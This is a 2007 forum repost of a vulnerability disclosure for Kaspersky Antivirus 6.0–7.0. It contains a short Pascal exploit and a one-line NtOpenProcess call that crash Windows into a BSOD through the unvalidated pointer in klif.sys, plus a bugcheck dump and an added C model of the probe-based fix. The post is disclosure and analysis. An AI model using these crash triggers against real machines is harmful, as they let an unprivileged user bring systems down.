Exploiting Kaspersky Antivirus 6.0-7.0

Anti
Posted on 2007-6-9 10:29:18
Author: EP_X0FF
Article source: 天天安全网


The reason why we decided to post this material on rootkit.com is simple:

The well-known and really good Kaspersky Antivirus has for a very long time suffered from a very dangerous bug, which can be used as an exploit to crash a system protected by this antivirus, even from a Guest account.
All attempts to inform Kaspersky Lab about this vulnerability were ignored. This material was posted some years ago, and last summer we posted a new exploit for Kaspersky AV 6.0 which was based on a security hole previously discovered by Ms-Rem. And nothing has changed. Even now, with the upcoming Kaspersky Antivirus 7.0, this exploit works very well.
The main goal of this exploit is calling NtOpenProcess with invalid parameters. This function is hooked by the Kaspersky driver called klif.sys, and the reason for its interception is obvious: this was done to protect Kaspersky AV from unauthorized access and from being closed by malware.

Here is the prototype of this function:

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
               IN ACCESS_MASK DesiredAccess,
               IN POBJECT_ATTRIBUTES ObjectAttributes,
               IN PCLIENT_ID ClientId OPTIONAL );


Here is a small exploit coded in Pascal (it worked well with klif.sys version 6.12.10.280 and previous versions):


var
  ob1: OBJECT_ATTRIBUTES;
  p1: DWORD;
begin
  ob1.Length := sizeof(ob1);
  NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;


As you can see, the last parameter is the address of a CLIENT_ID structure, and it points to an invalid random memory region in the kernel.
After starting this exploit on a clean Windows XP, without KAV, no BSOD appears.
After starting this exploit on Windows XP protected by KAV 7.0, we immediately get a BSOD: PAGE_FAULT_IN_NONPAGED_AREA.

Why did this happen? The explanation is very simple. The source of the hook on NtOpenProcess, I guess, looks like this:


NTSTATUS NewNtOpenProcess (
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    __try
    {
        /* ClientId is dereferenced here without being validated first */
        if (ClientId->UniqueProcess == KasperskyProcess)
            return STATUS_ACCESS_DENIED;
        else
            return RealNtOpenProcess(ProcessHandle, DesiredAccess,
                                     ObjectAttributes, ClientId);
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        ... stuff here ...
    }
}


The biggest mistake here is ClientId->UniqueProcess, since ClientId is a POINTER to a structure. Accessing an invalid memory region immediately causes PAGE_FAULT_IN_NONPAGED_AREA.
Originally the exploit was created by Ms-Rem and looked like this:


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);


Now, as you see, the KAV developers have used a try/except block, but as it shows, they don't know about MmIsAddressValid.

Hope now the developers of Kaspersky Antivirus will discover for themselves a wonderful program called NtCall and fix this bug.


*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP:  46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr [eax]

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  WRONG_SYMBOLS

BUGCHECK_STR:  0x50

LAST_CONTROL_TRANSFER:  from f941b39a to f941840c

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND:  kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr [eax]

SYMBOL_STACK_INDEX:  0

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  klif.sys

SYMBOL_NAME:  klif+1940c

BUCKET_ID:  WRONG_SYMBOLS

Followup: MachineOwner


Kind Regards,
EP_X0FF/UG North
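
What the bugcheck text above means by "it must be protected by a Probe", as an added example that is not part of the original post and is not Kaspersky's code: a user-mode C model of the range check that ProbeForRead applies to a pointer supplied by a user-mode caller, showing that an address such as 0x82000000 is rejected before anything dereferences it. The function names, the 32-bit constants and the hook prologue are assumptions made for illustration; a real driver calls ProbeForRead inside __try and copies the structure to a local before using it.

```c
#include <stdint.h>

/* Constructed model of 32-bit Windows XP: user-mode addresses end below
   0x7FFF0000, the default value of MmUserProbeAddress on x86. */
#define USER_PROBE_ADDRESS           0x7FFF0000u
#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u
#define CLIENT_ID_SIZE               8u   /* two 32-bit handles on x86 */

typedef enum { KernelMode, UserMode } MODE;
typedef enum { PASS_TO_ORIGINAL, READ_CLIENT_ID, FAIL_CALL } HOOK_ACTION;

/* The decision ProbeForRead makes, returned as a status instead of raised
   as an exception: the whole range must be aligned and lie in user space. */
uint32_t probe_for_read(uint32_t addr, uint32_t len, uint32_t align)
{
    uint32_t end = addr + len;

    if (len == 0)
        return STATUS_SUCCESS;
    if (addr & (align - 1))
        return STATUS_DATATYPE_MISALIGNMENT;
    if (end < addr || end > USER_PROBE_ADDRESS)   /* wrapped, or kernel range */
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Hypothetical hook prologue: decide whether ClientId may be read at all,
   before anything dereferences it. */
HOOK_ACTION check_client_id(MODE previous_mode, uint32_t client_id,
                            uint32_t *status)
{
    *status = STATUS_SUCCESS;
    if (client_id == 0)                  /* OPTIONAL parameter not supplied */
        return PASS_TO_ORIGINAL;
    if (previous_mode == KernelMode)     /* kernel callers are trusted */
        return READ_CLIENT_ID;
    *status = probe_for_read(client_id, CLIENT_ID_SIZE, 4);
    return *status == STATUS_SUCCESS ? READ_CLIENT_ID : FAIL_CALL;
}
```
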
wangjay1980
Posted on 2007-6-9 10:45:57
Someone has already sent this to the vendor.

[ This post was last edited by wangjay1980 on 2007-6-9 11:15 ]